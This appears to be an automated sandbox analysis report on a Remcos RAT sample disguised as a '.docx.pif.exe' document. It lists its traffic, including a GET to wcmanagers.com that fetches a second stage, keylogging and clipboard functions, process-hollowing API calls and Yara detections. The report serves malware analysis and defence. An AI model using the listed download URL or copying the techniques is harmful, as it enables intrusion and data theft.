Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 31_2_0459663B Sleep,URLDownloadToFileW,

31_2_0459663B

Source: global traffic

HTTP traffic detected: GET /Er9/233_Pyemdbrdpps HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: wcmanagers.com

Source: global traffic	DNS traffic detected: DNS query: wcmanagers.com
Source: global traffic	DNS traffic detected: DNS query: www.vipguyclassproject2024.space
Source: global traffic	DNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa

Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: colorcpl.exe	String found in binary or memory: http://geoplugin.net/json.gp
Source: colorcpl.exe, 0000001F.00000002.3702973204.0000000004580000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000001F.00000002.3705302881.0000000006420000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp/C
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0C
Source: xkn.exe, 00000016.00000002.1319214441.000001EC81C41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1359129963.0000000026652000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1392779821.000000007FC80000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1359129963.00000000265F6000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1362819613.0000000027650000.00000004.00000020.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1335815868.0000000002326000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1362819613.00000000276AC000.00000004.00000020.00020000.00000000.sdmp, drbdmeyP.pif, drbdmeyP.pif, 00000003.00000001.1257794553.000000000043B000.00000040.00000001.00020000.00000000.sdmp, drbdmeyP.pif, 00000003.00000002.1420295868.0000000000400000.00000040.00000400.00020000.00000000.sdmp, drbdmeyP.pif, 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmp, drbdmeyP.pif, 00000003.00000000.1257373309.0000000000416000.00000002.00000001.01000000.00000005.sdmp, drbdmeyP.pif.0.dr	String found in binary or memory: http://www.pmail.com
Source: xkn.exe, 00000016.00000002.1319214441.000001EC81CA1000.00000004.00000800.00020000.00000000.sdmp, xkn.exe, 00000016.00000002.1319214441.000001EC81C63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: SystemSettingsAdminFlows.exe, 00000028.00000002.3692868865.000002F388E38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.windows.localP
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1333260150.0000000000870000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wcmanagers.com/
Source: drbdmeyP.pif, 00000003.00000001.1257794553.00000000004CC000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wcmanagers.com/Er9/233_Pyemdbrdpps
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1333260150.00000000007FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wcmanagers.com/Er9/233_Pyemdbrdpps03
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1333260150.000000000087A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wcmanagers.com:443/Er9/233_PyemdbrdppsWz

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443

Source: unknown

HTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49700 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to register a low level keyboard hook

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 31_2_0458A2B8 SetWindowsHookExA 0000000D,0458A2A4,00000000

31_2_0458A2B8

Contains functionality for read data from the clipboard

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 31_2_0458B70E OpenClipboard,GetClipboardData,CloseClipboard,

31_2_0458B70E

Contains functionality to modify clipboard data

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 31_2_045968C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

31_2_045968C1

Contains functionality to read the clipboard data

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 31_2_0458B70E OpenClipboard,GetClipboardData,CloseClipboard,

31_2_0458B70E

Contains functionality to retrieve information about pressed keystrokes

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 31_2_0458A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,

31_2_0458A3E0

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: 31.2.colorcpl.exe.4580000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.colorcpl.exe.64218af.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.colorcpl.exe.64218af.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.colorcpl.exe.4580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.colorcpl.exe.6420000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.colorcpl.exe.6420000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001F.00000002.3702973204.0000000004580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.3694699773.000000000281F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.3705302881.0000000006420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 7688, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\gaban\logs.dat, type: DROPPED

Spam, unwanted Advertisements and Ransom Demands

Contains functionalty to change the wallpaper

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 31_2_0459C9E2 SystemParametersInfoW,

31_2_0459C9E2

Reads the Security eventlog

Source: C:\Users\Public\xkn.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\Public\xkn.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\Public\xkn.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\PowerShell	Jump to behavior
Source: C:\Users\Public\xkn.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Users\Public\xkn.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior

Reads the System eventlog

Source: C:\Users\Public\xkn.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\Public\xkn.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\Public\xkn.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Users\Public\xkn.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: 31.2.colorcpl.exe.4580000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 31.2.colorcpl.exe.4580000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 31.2.colorcpl.exe.4580000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 31.2.colorcpl.exe.64218af.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 31.2.colorcpl.exe.64218af.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 31.2.colorcpl.exe.64218af.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 31.2.colorcpl.exe.64218af.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 31.2.colorcpl.exe.64218af.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 31.2.colorcpl.exe.64218af.1.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 31.2.colorcpl.exe.4580000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 31.2.colorcpl.exe.4580000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 31.2.colorcpl.exe.4580000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 31.2.colorcpl.exe.6420000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 31.2.colorcpl.exe.6420000.2.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 31.2.colorcpl.exe.6420000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 31.2.colorcpl.exe.6420000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 31.2.colorcpl.exe.6420000.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 31.2.colorcpl.exe.6420000.2.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000001F.00000002.3702973204.0000000004580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000001F.00000002.3702973204.0000000004580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000001F.00000002.3702973204.0000000004580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0000001F.00000002.3705302881.0000000006420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000001F.00000002.3705302881.0000000006420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000001F.00000002.3705302881.0000000006420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: Process Memory Space: colorcpl.exe PID: 7688, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown

Abnormal high CPU Usage

Source: C:\Windows\SysWOW64\colorcpl.exe

Process Stats: CPU usage > 49%

Contains functionality to call native functions

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_029981B8 CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	0_2_029981B8
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_0299C7B4 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,	0_2_0299C7B4
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_0299C724 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	0_2_0299C724
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_0299A524 GetModuleHandleW,GetProcAddress,NtOpenProcess,GetCurrentProcess,IsBadReadPtr,IsBadReadPtr,GetCurrentProcess,GetModuleHandleW,GetProcAddress,NtWriteVirtualMemory,GetModuleHandleW,GetProcAddress,NtCreateThreadEx,CloseHandle,	0_2_0299A524
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_02997A94 GetModuleHandleA,GetProcAddress,NtWriteVirtualMemory,	0_2_02997A94
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_0299DA24 GetModuleHandleW,GetProcAddress,NtQueryInformationProcess,	0_2_0299DA24
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_0299C898 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,	0_2_0299C898
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_0299D9A4 GetModuleHandleW,GetProcAddress,NtQueryInformationProcess,	0_2_0299D9A4
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_02997944 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,	0_2_02997944
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_02997E14 LoadLibraryExA,GetModuleHandleA,GetProcAddress,NtFlushInstructionCache,FreeLibrary,	0_2_02997E14
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_02997CC8 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,	0_2_02997CC8
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_029981B6 CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	0_2_029981B6
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_0299C6AC RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	0_2_0299C6AC
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe	Code function: 0_2_0299C7B2 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,	0_2_0299C7B2
